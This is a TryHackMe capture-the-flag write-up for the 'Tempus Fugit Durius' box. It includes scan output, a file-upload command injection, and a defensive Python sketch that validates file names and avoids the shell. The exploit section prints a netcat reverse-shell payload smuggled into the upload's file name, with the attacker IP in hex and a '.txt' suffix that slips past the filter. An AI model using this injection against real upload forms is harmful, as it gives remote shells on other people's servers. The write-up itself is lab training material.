# TryHackMe - Tempus Fugit Durius

![](/files/-M7dipoEeszt0sRQzTMK)

## Nmap

```bash
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
|   2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
|   256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
|_  256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Tempus Fugit Durius
|_http-trane-info: Problem with XML parsing of /evox/about
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36350/udp6  status
|   100024  1          40573/tcp   status
|   100024  1          50794/udp   status
|_  100024  1          54565/tcp6  status
40573/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## Enumeration

### HTTP

Checking port 80 shows the following page:

![](/files/-M7djN4X6eXIixWlrP_5)

#### Gobuster

I tried to run **gobuster** but everything returns a 200 OK, so time to do some manual enumeration.

```bash
gobuster dir -u http://10.10.174.220 -w /usr/share/wordlists/dirb/common.txt -e .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.174.220
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/05/18 17:56:13 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.174.220/085aca89-6cca-43b0-9d55-dd3fab285f8d => 200. To force processing of Wildcard responses, specify the '--wildcard' switch  

```

#### Checking the Upload Page

![](/files/-M7dpf-1nMXDh_3eByJb)

I tried uploading a PHP web shell, but it failed.

![](/files/-M7dpu0t4UAaGxZ3zZHi)

The application states that it only accepts **txt** and **rtf** files.

![](/files/-M7dqB5blhMLGtxHk7hv)

#### Uploading a TXT file

```bash
# I create a TXT file
echo "This is a test from squid22" > squid22.txt
```

![](/files/-M7dqsnjgpZoP4_k7Jtn)

Based on the upload message, I can see that the application reads the content of my **TXT** file.

#### Checking Possible RCE

This time, I upload the same **TXT** file, but I add the command **id** to see what happens.

![](/files/-M7ds_2iswSsOGUPIed7)

And that worked.

![](/files/-M7ds-F30L42vBMdoBCp)

## Exploit

Trying to get a shell with **netcat** was a bit hit and miss. Every time I tried something different, I got a message saying **the file name was way too long**.

![](/files/-M7eZ6sWPa7lmXYM17bL)

After some research and a lot of failed shell executions, I managed to get a shell using my IP address encoded in hex.

![](/files/-M7ec9aNN43bpkbR3mhs)

My code to get a shell:

```bash
"#;nc 0x0A0B07BC 53 -w sh;a.txt"
```

If you try that on your own Kali machine, you can see that bash interprets the IP address in hex and it works fine. The reason for the **a.txt** at the end was the file filter, which only allows **TXT** and **RTF**.

![](/files/-M7eY_Z5I5mWRxNEfzrC)

![](/files/-M7ebpVvTAghyO7S4ILO)

## Code Research

Only allows **TXT** and **RTF**

![](/files/-M7eeD3gRerSVIs8zWpR)

And here is why the IP address was failing...

![](/files/-M7eePbEohdGclMNhPrN)
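From the defender's side, the two weaknesses seen above are an extension filter that only looks at the end of the file name and a file name that reaches a shell. The sketch below is an added example, not the application's own code: `suffix_only_check` is an assumed shape of the weak filter, and the function names, the 32-character limit and the use of `cat` on a POSIX host are assumptions.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# The file name from the write-up, used here only as test input.
PAYLOAD_NAME = "#;nc 0x0A0B07BC 53 -w sh;a.txt"

def suffix_only_check(name: str) -> bool:
    """Assumed shape of the weak filter: only the ending is inspected."""
    return name.lower().endswith((".txt", ".rtf"))

# Allowlist for the whole name: short basename, then .txt or .rtf.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}\.(txt|rtf)", re.IGNORECASE)

def is_safe_upload_name(name: str) -> bool:
    """Accept a name only if every character is on the allowlist."""
    return SAFE_NAME.fullmatch(name) is not None

def read_upload(path: Path) -> str:
    """Read a file with an external tool without going through a shell.

    The path is a single argv element, so ';', '#' and spaces in it are
    never parsed as shell syntax. '--' stops cat treating it as an option.
    """
    result = subprocess.run(["cat", "--", str(path)],
                            capture_output=True, text=True, check=True)
    return result.stdout

def handle_upload(upload_dir: Path, name: str, data: bytes) -> str:
    """Validate the name, store the upload, and return its contents."""
    if not is_safe_upload_name(name):
        raise ValueError(f"rejected file name: {name!r}")
    target = upload_dir / name
    target.write_bytes(data)
    return read_upload(target)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        # Weak filter accepts the name, allowlist rejects it.
        print(suffix_only_check(PAYLOAD_NAME), is_safe_upload_name(PAYLOAD_NAME))
        print(handle_upload(Path(tmp), "squid22.txt", b"This is a test from squid22\n"))
```

Either control alone blocks this input; using both means a gap in the allowlist still does not turn a file name into a command.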

## Privilege Escalation

We find some creds under the **/app** directory which allow us to log in as root.

![](/files/-M7ef47feSwfJCYPOczA)

![](/files/-M7enOjQHBmRJIoCBIHb)

